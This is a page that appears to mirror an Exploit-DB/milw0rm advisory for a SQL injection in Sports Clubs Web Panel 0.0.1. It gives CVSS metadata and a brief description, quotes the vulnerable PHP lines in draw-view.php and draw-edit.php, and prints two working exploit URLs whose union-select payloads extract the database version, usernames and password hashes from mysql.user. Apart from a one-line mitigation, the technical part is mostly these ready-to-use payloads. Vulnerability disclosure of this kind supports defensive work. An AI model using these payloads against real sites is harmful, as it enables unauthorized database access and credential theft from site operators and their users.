header-logo
Suggest Exploit
vendor:
Sports Clubs Web Panel
by:
virangar security team
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Sports Clubs Web Panel
Affected Version From: 0.0.1
Affected Version To: 0.0.1
Patch Exists: NO
Related CWE: N/A
CPE: a:sports_clubs_web_panel:sports_clubs_web_panel:0.0.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Sports Clubs Web Panel 0.0.1 SQL Injection Vulnerability

Sports Clubs Web Panel 0.0.1 is vulnerable to SQL Injection. This vulnerability is due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'draw-view.php' and 'draw-edit.php' scripts. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL queries. The attacker can also gain access to sensitive information such as usernames and passwords.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to generate SQL queries.
Source

Exploit-DB raw data:

  ###################################################################################
  #                                                                                 #
  #   ...::::: Sports Clubs Web Panel 0.0.1 SQL Injection Vulnerability ::::....    #           
  ###################################################################################

Virangar Security Team

www.virangar.net


--------
Discoverd By :virangar security team(Zahra:zh_virangar)

special tnx :my master hadihadi

tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007

& all virangar members & all hackerz
-------
vuln codes in /include/draw-view.php:

line 22:   if(isset($_GET['id']) || isset($_POST['id'])) {
lin 23:      $teamid = $_GET['id'].$_POST['id'];
...
...
line 43:  $drawTeam = mysql_query("SELECT * FROM draw WHERE dteam = '$teamid' ORDER BY ddate");
----------
vuln codes in /include/draw-edit.php

line 1:       $id = $_GET['id'];
line 2:       $editDraw = mysql_query("SELECT * FROM draw WHERE did='$id' LIMIT 1");
--------
exploit:
http://site.com/[patch]/?p=draw-view&id='/**/union/**/select/**/1,2,3,version(),5,6,User,password%20,9/**/from/**/mysql.user/*
http://site.com/[patch]/?p=draw-edit&id='/**/union/**/select/**/1,2,3,4,5,version(),7,8,9/*
-------------
young iranian h4ck3rz

# milw0rm.com [2008-09-11]

Navigation

Suggest Exploit

Services By CQR